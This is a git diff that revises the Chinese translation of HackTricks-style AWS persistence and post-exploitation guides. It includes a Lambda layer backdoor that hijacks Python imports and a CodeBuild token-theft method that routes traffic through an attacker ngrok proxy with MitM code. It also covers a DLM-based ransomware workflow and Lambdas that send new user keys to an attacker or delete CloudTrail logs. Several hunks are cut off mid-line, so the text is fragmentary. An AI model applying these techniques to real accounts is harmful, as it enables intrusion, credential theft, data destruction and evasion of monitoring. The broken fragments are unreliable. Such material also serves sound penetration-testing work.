+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
@@ -1,4 +1,4 @@
-# AWS - ECR Persistence
+# AWS - ECR 持久性
{{#include ../../../banners/hacktricks-training.md}}
@@ -10,13 +10,13 @@
../aws-services/aws-ecr-enum.md
{{#endref}}
-### 带有恶意代码的隐藏Docker镜像
+### 带有恶意代码的隐藏 Docker 镜像
-攻击者可以**将包含恶意代码的Docker镜像**上传到ECR存储库,并利用它在目标AWS账户中保持持久性。然后,攻击者可以以隐蔽的方式将恶意镜像部署到账户内的各种服务,例如Amazon ECS或EKS。
+攻击者可以 **将包含恶意代码的 Docker 镜像上传** 到 ECR 存储库,并利用它在目标 AWS 账户中保持持久性。攻击者随后可以以隐蔽的方式将恶意镜像部署到账户内的各种服务,例如 Amazon ECS 或 EKS。
### 存储库策略
-向单个存储库添加策略,授予您自己(或所有人)对存储库的访问权限:
+向单个存储库添加策略,授予自己(或所有人)对存储库的访问权限:
```bash
aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
@@ -41,11 +41,11 @@ aws ecr set-repository-policy \
}
```
> [!WARNING]
-> 请注意,ECR要求用户通过IAM策略具有**权限**,以便在**认证**到注册表并从任何Amazon ECR存储库推送或拉取任何镜像之前,可以调用**`ecr:GetAuthorizationToken`** API。
+> 请注意,ECR要求用户在通过IAM策略**进行身份验证**之前,必须具有**权限**以调用**`ecr:GetAuthorizationToken`** API,以便能够向注册表推送或拉取任何来自任何Amazon ECR存储库的镜像。
### 注册表策略与跨账户复制
-可以通过配置跨账户复制自动复制外部账户中的注册表,在那里您需要**指明外部账户**,您希望复制注册表。
+可以通过配置跨账户复制自动复制外部账户中的注册表,在此过程中需要**指明外部账户**,以便您想要复制注册表。
.png)
.png)
.png)
:function::1`
-1. 注意arn的最后部分:1 **指示函数的版本**(在此场景中,版本1将是后门版本)。
-5. 选择创建的POST方法,在操作中选择**`部署API`**
-6. 现在,当您**通过POST调用函数时,您的后门**将被调用
+4. 转到 API 网关并**创建一个新的 POST 方法**(或选择任何其他方法),该方法将执行 lambda 的后门版本:`arn:aws:lambda:us-east-1::function::1`
+1. 注意 arn 最后的 :1 **指示函数的版本**(在此场景中,版本 1 将是后门版本)。
+5. 选择创建的 POST 方法,在操作中选择**`部署 API`**
+6. 现在,当您**通过 POST 调用函数时,您的后门**将被调用
-### Cron/Event actuator
+### Cron/事件触发器
-您可以使**lambda函数在某些事件发生或经过一段时间后运行**,这使得lambda成为获得持久性和避免检测的良好且常见的方法。\
-在这里,您有一些想法,可以通过创建lambdas使您的**AWS存在更加隐秘**。
+您可以使**lambda 函数在某些事件发生或经过一段时间后运行**,这使得 lambda 成为获得持久性和避免检测的良好且常见的方法。\
+在这里,您有一些想法可以通过创建 lambdas 来使您在 AWS 中的**存在更加隐蔽**。
-- 每当创建新用户时,lambda生成一个新用户密钥并将其发送给攻击者。
-- 每当创建新角色时,lambda授予被攻陷用户假设角色的权限。
-- 每当生成新的cloudtrail日志时,删除/更改它们。
+- 每当创建新用户时,lambda 生成一个新用户密钥并将其发送给攻击者。
+- 每当创建新角色时,lambda 授予被攻陷用户假设角色的权限。
+- 每当生成新的 cloudtrail 日志时,删除/更改它们
{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
index 5bcb6d4df..a78f6bd26 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
@@ -4,10 +4,10 @@
## Lambda 扩展
-Lambda 扩展通过与各种 **监控、可观察性、安全和治理工具** 集成来增强功能。这些扩展通过 [.zip 压缩包使用 Lambda 层](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) 添加,或包含在 [容器镜像部署中](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/),以两种模式运行:**内部** 和 **外部**。
+Lambda 扩展通过与各种 **监控、可观察性、安全性和治理工具** 集成来增强功能。这些扩展通过 [.zip 压缩包使用 Lambda 层](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) 添加,或包含在 [容器镜像部署](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/) 中,以两种模式运行:**内部** 和 **外部**。
- **内部扩展** 与运行时进程合并,使用 **特定语言的环境变量** 和 **包装脚本** 操作其启动。此自定义适用于多种运行时,包括 **Java Correto 8 和 11、Node.js 10 和 12,以及 .NET Core 3.1**。
-- **外部扩展** 作为单独的进程运行,与 Lambda 函数的生命周期保持操作对齐。它们与多种运行时兼容,如 **Node.js 10 和 12、Python 3.7 和 3.8、Ruby 2.5 和 2.7、Java Corretto 8 和 11、.NET Core 3.1** 以及 **自定义运行时**。
+- **外部扩展** 作为单独的进程运行,与 Lambda 函数的生命周期保持操作一致。它们与多种运行时兼容,如 **Node.js 10 和 12、Python 3.7 和 3.8、Ruby 2.5 和 2.7、Java Corretto 8 和 11、.NET Core 3.1** 以及 **自定义运行时**。
有关 [**Lambda 扩展如何工作的更多信息,请查看文档**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html)。
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
index af5a1d01b..2fcf4482f 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
@@ -8,9 +8,9 @@ Lambda 层是一个 .zip 文件归档,**可以包含额外的代码**或其他
每个函数最多可以包含 **五个层**。当你在一个函数中包含一个层时,**内容会被提取到执行环境中的 `/opt`** 目录。
-**默认情况下**,你创建的 **层** 对你的 AWS 账户是 **私有** 的。你可以选择 **与其他账户共享** 一个层或 **将** 该层 **公开**。如果你的函数使用了其他账户发布的层,即使该层被删除或你被撤销访问权限,你的函数仍然可以 **继续使用该层版本**。但是,你不能使用已删除的层版本创建新函数或更新函数。
+**默认情况下**,你创建的 **层** 对你的 AWS 账户是 **私有** 的。你可以选择 **与其他账户共享** 一个层或 **将** 该层 **公开**。如果你的函数使用了其他账户发布的层,你的函数可以 **在该层被删除后,或在你被撤销访问该层的权限后继续使用该层版本**。但是,你不能使用已删除的层版本创建新函数或更新函数。
-作为容器镜像部署的函数不使用层。相反,当你构建镜像时,你将所需的运行时、库和其他依赖项打包到容器镜像中。
+作为容器镜像部署的函数不使用层。相反,当你构建镜像时,你将首选的运行时、库和其他依赖项打包到容器镜像中。
### Python load path
@@ -18,20 +18,20 @@ Python 在 lambda 中使用的加载路径如下:
```
['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages']
```
-检查 **第二** 和 **第三** **位置** 是否被 **lambda layers** 解压其文件的目录占用: **`/opt/python/lib/python3.9/site-packages`** 和 **`/opt/python`**
+检查 **第二** 和第三 **位置** 被 **lambda layers** 解压其文件的目录占用情况: **`/opt/python/lib/python3.9/site-packages`** 和 **`/opt/python`**
> [!CAUTION]
-> 如果攻击者设法 **后门** 一个被使用的 lambda **layer** 或 **添加一个** 在加载常用库时会 **执行任意代码** 的层,他将能够在每次 lambda 调用时执行恶意代码。
+> 如果攻击者设法 **后门** 一个被使用的 lambda **layer** 或 **添加一个** 在加载常见库时会 **执行任意代码** 的层,他将能够在每次 lambda 调用时执行恶意代码。
因此,要求是:
-- **检查库** 这些库是 **被受害者代码加载的**
+- **检查** 受害者代码 **加载的库**
- 创建一个 **带有 lambda layers 的代理库**,该库将 **执行自定义代码** 并 **加载原始** 库。
### 预加载的库
> [!WARNING]
-> 在滥用此技术时,我发现了一个困难:一些库在你的代码执行时已经在 python 运行时中 **被加载**。我原本期待找到像 `os` 或 `sys` 这样的东西,但 **甚至 `json` 库也被加载**。\
+> 在滥用此技术时,我发现了一个困难:一些库在你的代码执行时已经在 python 运行时中 **加载**。我原本期待找到像 `os` 或 `sys` 这样的东西,但 **甚至 `json` 库也已加载**。\
> 为了滥用这种持久性技术,代码需要 **加载一个在代码执行时未加载的新库**。
使用这样的 python 代码,可以获得 **在 lambda 中预加载的库列表**:
@@ -48,20 +48,20 @@ return {
```
'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function'
```
-这是**lambda 默认包含的库**列表:[https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
+这是**lambda默认安装的库**列表:[https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
### Lambda Layer 后门
-在这个例子中,假设目标代码正在导入 **`csv`**。我们将对 **`csv` 库的导入进行后门处理**。
+在这个例子中,假设目标代码正在导入**`csv`**。我们将对**`csv`库的导入进行后门处理**。
-为此,我们将创建目录 **csv**,并在其中放置文件 **`__init__.py`**,路径为 lambda 加载的路径:**`/opt/python/lib/python3.9/site-packages`**\
-然后,当 lambda 执行并尝试加载 **csv** 时,我们的 **`__init__.py` 文件将被加载并执行**。\
+为此,我们将创建目录csv,并在其中放置文件**`__init__.py`**,路径为lambda加载的路径:**`/opt/python/lib/python3.9/site-packages`**\
+然后,当lambda被执行并尝试加载**csv**时,我们的**`__init__.py`文件将被加载并执行**。\
该文件必须:
- 执行我们的有效载荷
-- 加载原始的 csv 库
+- 加载原始的csv库
-我们可以通过以下方式同时完成这两项:
+我们可以通过以下方式实现这两者:
```python
import sys
from urllib import request
@@ -83,7 +83,7 @@ import csv as _csv
sys.modules["csv"] = _csv
```
-然后,创建一个 zip 文件,包含此代码,路径为 **`python/lib/python3.9/site-packages/__init__.py`**,并将其添加为 lambda 层。
+然后,创建一个包含此代码的 zip 文件,路径为 **`python/lib/python3.9/site-packages/__init__.py`** 并将其添加为 lambda 层。
您可以在 [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor) 找到此代码。
@@ -101,8 +101,8 @@ sys.modules["csv"] = _csv
因此,为了提高此技术的灵活性,攻击者可以:
- 在用户的现有层中植入后门(没有任何外部内容)
-- **在他的账户中创建**一个**层**,给予**受害者账户使用**该层的权限,**配置**受害者的 Lambda 中的**层**并**移除权限**。
-- **Lambda** 仍然能够**使用该层**,而**受害者**将没有任何简单的方法来**下载层代码**(除了在 lambda 内部获取反向 shell)
+- **在** **他的账户中创建**一个**层**,给予**受害者账户使用**该层的**访问权限**,**配置**受害者的 Lambda 中的**层**并**移除权限**。
+- **Lambda** 仍然能够**使用该层**,而**受害者将**没有任何简单的方法来**下载层代码**(除了在 lambda 内部获取反向 shell)
- 受害者**不会看到**使用 **`aws lambda list-layers`** 的外部层
```bash
# Upload backdoor layer
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
index 03372a14f..0ddb4d339 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
@@ -4,7 +4,7 @@
## Lightsail
-有关更多信息,请查看:
+更多信息请查看:
{{#ref}}
../aws-services/aws-lightsail-enum.md
@@ -12,22 +12,22 @@
### 下载实例 SSH 密钥和数据库密码
-它们可能不会被更改,因此拥有它们是持久性的一个好选择
+它们可能不会被更改,因此拥有它们是持久性的一个好选择。
### 后门实例
-攻击者可以访问实例并对其进行后门操作:
+攻击者可以访问实例并植入后门:
- 例如使用传统的 **rootkit**
- 添加新的 **公共 SSH 密钥**
-- 使用后门暴露一个端口并进行端口敲击
+- 通过端口敲击暴露一个端口并植入后门
### DNS 持久性
如果域名已配置:
-- 创建一个指向您的 IP 的子域,以便您将拥有 **子域接管**
+- 创建一个指向您 IP 的子域,以便您将拥有 **子域接管**
- 创建 **SPF** 记录,允许您从该域发送 **电子邮件**
-- 将 **主域 IP 配置为您自己的 IP**,并从您的 IP 对合法 IP 执行 **MitM**
+- 将 **主域 IP 配置为您自己的 IP**,并从您的 IP 对合法 IP 执行 **MitM**
{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
index 0d3859920..54afedd5d 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
@@ -10,7 +10,7 @@
../aws-services/aws-relational-database-rds-enum.md
{{#endref}}
-### 使实例公开可访问:`rds:ModifyDBInstance`
+### 使实例公开可访问: `rds:ModifyDBInstance`
具有此权限的攻击者可以**修改现有的 RDS 实例以启用公共可访问性**。
```bash
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
index 2eb434759..4eaf4055e 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
@@ -16,7 +16,7 @@
.png)
.png)
.png)
--tag-keys
### `codebuild:DeleteSourceCredentials`
-攻击者可以删除 Git 存储库的源凭证,影响依赖该存储库的应用程序的正常运行。
+攻击者可以删除 Git 存储库的源凭据,影响依赖于该存储库的应用程序的正常运行。
```sql
aws codebuild delete-source-credentials --arn
```
-**潜在影响**:由于源凭证的删除,依赖受影响存储库的应用程序的正常功能受到干扰。
+**潜在影响**:由于源凭据的删除,依赖受影响存储库的应用程序的正常功能受到干扰。
{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
index 227cb4d8d..9e2f196db 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -10,33 +10,33 @@ aws codebuild list-source-credentials
```
### 通过 Docker 镜像
-如果你发现例如 Github 的认证已在账户中设置,你可以通过让 Codebuild **使用特定的 docker 镜像** 来运行项目的构建,从而 **提取** 该 **访问** (**GH token 或 OAuth token**)。
+如果您发现例如 Github 的身份验证已在账户中设置,您可以通过让 Codebuild **使用特定的 Docker 镜像** 来 **提取** 该 **访问** (**GH token 或 OAuth token**)以运行项目的构建。
-为此,你可以 **创建一个新的 Codebuild 项目** 或更改现有项目的 **环境** 以设置 **Docker 镜像**。
+为此,您可以 **创建一个新的 Codebuild 项目** 或更改现有项目的 **环境** 以设置 **Docker 镜像**。
-你可以使用的 Docker 镜像是 [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm)。这是一个非常基础的 Docker 镜像,将设置 **环境变量 `https_proxy`**、**`http_proxy`** 和 **`SSL_CERT_FILE`**。这将允许你拦截在 **`https_proxy`** 和 **`http_proxy`** 中指示的主机的大部分流量,并信任在 **`SSL_CERT_FILE`** 中指示的 SSL 证书。
+您可以使用的 Docker 镜像是 [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm)。这是一个非常基本的 Docker 镜像,将设置 **环境变量 `https_proxy`**、**`http_proxy`** 和 **`SSL_CERT_FILE`**。这将允许您拦截在 **`https_proxy`** 和 **`http_proxy`** 中指示的主机的大部分流量,并信任在 **`SSL_CERT_FILE`** 中指示的 SSL 证书。
-1. **创建并上传你自己的 Docker MitM 镜像**
-- 按照仓库的说明设置你的代理 IP 地址并设置你的 SSL 证书,然后 **构建 docker 镜像**。
+1. **创建并上传您自己的 Docker MitM 镜像**
+- 按照仓库的说明设置您的代理 IP 地址并设置您的 SSL 证书,然后 **构建 Docker 镜像**。
- **不要设置 `http_proxy`** 以避免拦截对元数据端点的请求。
-- 你可以使用 **`ngrok`**,例如 `ngrok tcp 4444` 来将代理设置为你的主机。
-- 一旦你构建了 Docker 镜像,**将其上传到公共仓库**(Dockerhub, ECR...)。
+- 您可以使用 **`ngrok`**,例如 `ngrok tcp 4444` 来将代理设置为您的主机。
+- 一旦您构建了 Docker 镜像,**将其上传到公共仓库**(Dockerhub、ECR...)。
2. **设置环境**
- 创建一个 **新的 Codebuild 项目** 或 **修改** 现有项目的环境。
-- 设置项目使用 **之前生成的 Docker 镜像**。
+- 设置项目以使用 **之前生成的 Docker 镜像**。
.png)
\
]
}'
```
-- 然后,在代理变量指向的端口(http_proxy 和 https_proxy)运行 [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) 的基本示例
+- 然后,在代理变量指向的端口(http_proxy 和 https_proxy)运行来自 [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) 的基本示例
```python
from mitm import MITM, protocol, middleware, crypto
@@ -134,9 +134,9 @@ mitm.run()
### ~~通过 HTTP 协议~~
-> [!TIP] > **这个漏洞在 2023 年 2 月 20 日那周的某个时候被 AWS 修复了(我想是星期五)。所以攻击者不能再利用它了 :)**
+> [!TIP] > **这个漏洞在 2023 年 2 月第 20 周的某个时候被 AWS 修复了(我想是星期五)。所以攻击者不能再利用它了 :)**
-具有 **提升权限的攻击者在 CodeBuild 中可能会泄露配置的 Github/Bitbucket 令牌**,或者如果权限是通过 OAuth 配置的,则 **用于访问代码的临时 OAuth 令牌**。
+具有 **提升权限的攻击者在 CodeBuild 中可能会泄露配置的 Github/Bitbucket 令牌**,或者如果权限是通过 OAuth 配置的,则会泄露 **用于访问代码的临时 OAuth 令牌**。
- 攻击者可以将环境变量 **http_proxy** 和 **https_proxy** 添加到 CodeBuild 项目,指向他的机器(例如 `http://5.tcp.eu.ngrok.io:14972`)。
@@ -144,7 +144,7 @@ mitm.run()
.png)
.png)
--target-identifier
aws controltower enable-control --control-identifier --target-identifier
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
index f1707135a..9c840101d 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
@@ -8,7 +8,7 @@
勒索软件攻击可以通过加密尽可能多的 EBS 卷,然后删除当前的 EC2 实例、EBS 卷和快照来执行。为了自动化这一恶意活动,可以使用 Amazon DLM,使用来自另一个 AWS 账户的 KMS 密钥加密快照,并将加密的快照转移到不同的账户。或者,他们可能会将未加密的快照转移到他们管理的账户,然后在那里进行加密。尽管直接加密现有的 EBS 卷或快照并不简单,但可以通过创建新的卷或快照来实现。
-首先,将使用一个命令收集卷的信息,例如实例 ID、卷 ID、加密状态、附加状态和卷类型。
+首先,可以使用命令收集卷的信息,例如实例 ID、卷 ID、加密状态、附加状态和卷类型。
`aws ec2 describe-volumes`
@@ -16,7 +16,7 @@
```bash
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
```
-可以在这里看到政策文档的模板:
+可以在这里看到政策文件的模板:
```bash
{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
index 7962b57ee..21573b963 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
@@ -43,7 +43,7 @@ aws dynamodb batch-get-item \
{{#endtab }}
{{#endtabs }}
-**潜在影响:** 通过在表中定位敏感信息进行间接权限提升
+**潜在影响:** 通过在表中定位敏感信息间接提升权限
### `dynamodb:GetItem`
@@ -75,11 +75,11 @@ aws dynamodb transact-get-items \
}
]
```
-**潜在影响:** 通过定位表中的敏感信息进行间接权限提升
+**潜在影响:** 通过在表中定位敏感信息间接提升权限
### `dynamodb:Query`
-**与之前的权限类似,** 这项权限允许潜在攻击者根据要检索的条目的主键从仅一个表中读取值。它允许使用[比较子集](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html),但唯一允许与主键(必须出现)进行的比较是 "EQ",因此您无法使用比较在请求中获取整个数据库。
+**与之前的权限类似,** 这项权限允许潜在攻击者根据要检索的条目的主键从仅一个表中读取值。它允许使用 [子集比较](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html),但唯一允许与主键(必须出现)进行的比较是 "EQ",因此您无法使用比较在请求中获取整个数据库。
{{#tabs }}
{{#tab name="json file" }}
@@ -107,7 +107,7 @@ aws dynamodb query \
{{#endtab }}
{{#endtabs }}
-**潜在影响:** 通过定位表中的敏感信息进行间接权限提升
+**潜在影响:** 通过在表中定位敏感信息间接提升权限
### `dynamodb:Scan`
@@ -119,7 +119,7 @@ aws dynamodb scan --table-name #Get data inside the table
### `dynamodb:PartiQLSelect`
-您可以使用此权限来**轻松导出整个表**。
+您可以使用此权限**轻松导出整个表**。
```bash
aws dynamodb execute-statement \
--statement "SELECT * FROM ProductCatalog"
@@ -144,7 +144,7 @@ aws dynamodb export-table-to-point-in-time \
--export-time \
--region
```
-注意,要使其工作,表需要启用时间点恢复,你可以通过以下方式检查表是否启用:
+请注意,要使其正常工作,表需要启用时间点恢复,您可以通过以下方式检查表是否启用:
```bash
aws dynamodb describe-continuous-backups \
--table-name
@@ -155,22 +155,22 @@ aws dynamodb update-continuous-backups \
--table-name \
--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
```
-**潜在影响:** 通过在表中定位敏感信息进行间接权限提升
+**潜在影响:** 通过在表中定位敏感信息间接提升权限
### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`
-拥有这些权限后,攻击者将能够**从备份中创建新表**(甚至可以创建备份,然后在不同的表中恢复它)。然后,凭借必要的权限,他将能够检查**信息**,这些信息**可能不再在生产**表中。
+拥有这些权限的攻击者将能够**从备份中创建新表**(甚至可以创建备份,然后在不同的表中恢复它)。然后,凭借必要的权限,他将能够检查**备份中的信息**,这些信息**可能不再在生产**表中。
```bash
aws dynamodb restore-table-from-backup \
--backup-arn \
--target-table-name \
--region
```
-**潜在影响:** 通过定位表备份中的敏感信息进行间接权限提升
+**潜在影响:** 通过在表备份中定位敏感信息间接提升权限
### `dynamodb:PutItem`
-此权限允许用户**向表中添加新项或用新项替换现有项**。如果具有相同主键的项已经存在,**整个项将被新项替换**。如果主键不存在,将**创建**一个具有指定主键的新项。
+此权限允许用户将**新项目添加到表中或用新项目替换现有项目**。如果具有相同主键的项目已经存在,**整个项目将被新项目替换**。如果主键不存在,将**创建**一个具有指定主键的新项目。
{{#tabs }}
{{#tab name="XSS Example" }}
@@ -206,7 +206,7 @@ aws dynamodb put-item \
### `dynamodb:UpdateItem`
-此权限允许用户**修改项目的现有属性或向项目添加新属性**。它并**不替换**整个项目;它仅更新指定的属性。如果主键在表中不存在,则该操作将**创建一个新项目**,并使用指定的主键设置更新表达式中指定的属性。
+此权限允许用户**修改项目的现有属性或向项目添加新属性**。它**不会替换**整个项目;它只更新指定的属性。如果主键在表中不存在,该操作将**创建一个新项目**,并使用指定的主键设置更新表达式中指定的属性。
{{#tabs }}
{{#tab name="XSS Example" }}
@@ -262,7 +262,7 @@ aws dynamodb delete-backup \
--backup-arn arn:aws:dynamodb:::table/TargetTable/backup/BACKUP_ID \
--region
```
-**潜在影响**:数据丢失以及在灾难恢复场景中无法从备份中恢复。
+**潜在影响**:数据丢失和在灾难恢复场景中无法从备份中恢复。
### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords`
@@ -278,7 +278,7 @@ bashCopy codeaws dynamodb update-table \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
--region
```
-2. 描述获取 ARN 和其他详细信息的流:
+2. 描述获取 ARN 和其他细节的流:
```bash
bashCopy codeaws dynamodb describe-stream \
--table-name TargetTable \
@@ -298,6 +298,6 @@ bashCopy codeaws dynamodbstreams get-records \
--shard-iterator \
--region
```
-**潜在影响**:对DynamoDB表更改的实时监控和数据泄露。
+**潜在影响**:对DynamoDB表更改的实时监控和数据泄漏。
{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
index f2068462f..fd680ffd2 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
@@ -12,7 +12,7 @@
### **恶意 VPC 镜像 -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule`
-VPC 流量镜像 **在 VPC 内复制 EC2 实例的入站和出站流量**,无需在实例上安装任何东西。这些复制的流量通常会发送到网络入侵检测系统 (IDS) 进行分析和监控。\
+VPC 流量镜像 **在 VPC 内复制 EC2 实例的入站和出站流量**,无需在实例上安装任何东西。此复制的流量通常会发送到网络入侵检测系统 (IDS) 进行分析和监控。\
攻击者可以利用这一点捕获所有流量并从中获取敏感信息:
有关更多信息,请查看此页面:
@@ -23,7 +23,7 @@ aws-malicious-vpc-mirror.md
### 复制运行实例
-实例通常包含某种敏感信息。有不同的方法可以进入(查看 [EC2 权限提升技巧](../../aws-privilege-escalation/aws-ec2-privesc.md))。然而,检查其内容的另一种方法是 **创建一个 AMI 并从中运行一个新实例(甚至在您自己的账户中)**:
+实例通常包含某种敏感信息。有不同的方法可以进入(查看 [EC2 权限提升技巧](../../aws-privilege-escalation/aws-ec2-privesc.md))。然而,检查其内容的另一种方法是 **创建一个 AMI 并从中运行一个新实例(即使在您自己的账户中)**:
```shell
# List instances
aws ec2 describe-images
@@ -83,7 +83,7 @@ aws ec2 authorize-security-group-ingress --group-id --protocol tcp --por
可以运行一个 EC2 实例并将其注册为用于运行 ECS 实例,然后窃取 ECS 实例的数据。
-有关更多信息,请查看[**此处**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs)。
+对于 [**更多信息请查看此处**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs)。
### Remove VPC flow logs
```bash
@@ -95,19 +95,18 @@ aws ec2 delete-flow-logs --flow-log-ids --region
- `ssm:StartSession`
-除了命令执行,SSM 还允许流量隧道,这可以被滥用以从由于安全组或 NACL 而没有网络访问的 EC2 实例进行转发。
